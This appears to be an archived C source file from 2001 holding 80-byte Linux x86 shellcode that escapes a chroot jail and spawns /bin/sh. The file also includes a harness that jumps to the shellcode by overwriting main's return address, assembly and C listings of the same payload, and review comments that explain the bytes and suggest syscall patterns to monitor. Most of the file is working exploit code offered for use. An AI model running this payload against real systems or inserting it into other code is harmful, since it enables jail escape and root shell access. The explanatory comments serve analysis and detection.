C/C++ Source or Header  |  2001-01-12  |  3.2 KB  |  72 lines

  1. /* This is Linux chroot()/execve() code. It is 80 bytes long. I have some  *
  2.  * ideas how to make it smaller, but till then use this one.               *
  3.  *                                         signed predator                 *
  4.  *                                         linux registered user : 181116  *
  5.  *                                         preedator(at)sendmail(dot)ru    *
  6.  ***************************************************************************/
  7.  
  /*
   * sc: the 80-byte payload announced in the header comment, stored as an
   * ordinary NUL-terminated C string (5 rows of 16 bytes). No row contains a
   * zero byte, so strlen(sc) in main() reports the full length.
   *
   * According to the author's own "Asm code" and "C code" listings further
   * down this page, the bytes perform: syscall 0x17 with ebx = 0, then
   * mkdir("sh..", 0xed), chroot("sh.."), a counted chdir("..") loop,
   * chroot(".."), and finally execve("/bin/sh"). The C paraphrase leaves out
   * the opening 0x17 call (setuid on Linux i386) that the assembly shows.
   *
   * NOTE(review): this is the chroot escape that chroot(2) itself documents;
   * it depends on the confined process still being allowed to call chroot(2)
   * (root / CAP_SYS_CHROOT). A service that gives up that privilege after
   * entering its jail is not affected. For monitoring, the visible syscall
   * order -- setuid(0), mkdir, chroot, repeated chdir(".."), chroot, execve --
   * coming from a jailed process is the behaviour worth alerting on.
   */
  char sc[]="\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xeb\x36\x5e\x88\x46\x0a"
            "\x8d\x5e\x05\xb1\xed\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x83"
            "\xc3\x02\xb0\x0c\xcd\x80\xe0\xfa\xb0\x3d\xcd\x80\x89\x76\x08\x31"
            "\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x89\xc2\xb0\x0b"
            "\xcd\x80\xe8\xc5\xff\xff\xff/bin/sh..";
  13.  
  /*
   * Test harness for sc: prints strlen(sc), then stores the address of sc
   * into a stack slot located relative to the local variable `ret`.
   *
   * NOTE(review): the listing shows no #include lines, so printf() and
   * strlen() are used without prototypes; "%d" does not match strlen()'s
   * size_t result; and main() falls off the end without a return statement.
   */
  int main(){
    /* Points two pointer-sized slots above `ret` itself. Presumably that is
     * main's saved return address on the 32-bit x86 frame layout the author
     * compiled for -- this depends entirely on the compiler and its flags. */
    int *ret=(int *)(&ret+2);
    printf("len : %d\n",strlen(sc));
    /* Writes outside any declared object (undefined behaviour). The (int)
     * cast keeps only the low bits of the address where pointers are wider
     * than int. NOTE(review): sc sits in writable data, so where data pages
     * are mapped non-executable the transfer would fault instead of running. */
    *ret=(int)sc;
  }
  19.  
  20.  
  21. // Asm code
  22. /*********************************************
  23.  *int main(){                                *
  24.  * __asm__(" xorl %eax,%eax           \n"    *
  25.  *       " xorl %ebx,%ebx           \n"    *
  26.  *         " xorl %ecx,%ecx           \n"    *
  27.  *       " movb $0x17,%al           \n"    *
  28.  *       " int  $0x80               \n"    *
  29.  *         " jmp 0x36                 \n"    *
  30.  *         " popl %esi                \n"    *
  31.  *       " movb %al,0xa(%esi)       \n"    *
  32.  *         " leal 0x5(%esi),%ebx      \n"    *
  33.  *       " movb $0xed,%cl           \n"    *
  34.  *       " movb $0x27,%al           \n"    *
  35.  *       " int $0x80                \n"    *
  36.  *         " xorl %eax,%eax           \n"    *
  37.  *         " movb $0x3d,%al           \n"    *
  38.  *       " int $0x80                \n"    * 
  39.  *       " addl $0x2,%ebx           \n"    *
  40.  *         " movb $0xc,%al            \n"    *
  41.  *       " int $0x80                \n"    *
  42.  *         " loopne -0x06             \n"    *
  43.  *         " movb $0x3d,%al           \n"    *
  44.  *       " int $0x80                \n"    *
  45.  *       " movl %esi,0x8(%esi)      \n"    * 
  46.  *         " xorl %eax,%eax           \n"    * 
  47.  *         " movb %al,0x7(%esi)       \n"    *
  48.  *         " movl %eax,0xc(%esi)      \n"    *
  49.  *         " movl %esi,%ebx           \n"    *
  50.  *         " leal 0x8(%esi),%ecx      \n"    *
  51.  *         " movl %eax,%edx           \n"    *
  52.  *         " movb $0xb,%al            \n"    *
  53.  *         " int $0x80                \n"    *
  54.  *         " call -0x3b               \n"    *
  55.  *         " .string \"/bin/sh..\"    \n");  *
  56.  *}                                          *
  57.  *********************************************/ 
  58.  
  59. //C code
  60. /**********************************************
  61. *int main(){                                  *
  62. *  char *sh[2]={"/bin/sh",NULL};              *
  63. *  int gg=0xed;                               *
  64. *  mkdir("sh..",gg);                  *
  65. *  chroot("sh..");                  *
  66. *  while (gg!=0){                             *
  67. *     chdir("..");gg--;                       *
  68. *  }                                          *
  69. * chroot("..");                               *
  70. * execve(sh[0],sh,NULL);                      *
  71. *}                                            *
  72. ***********************************************/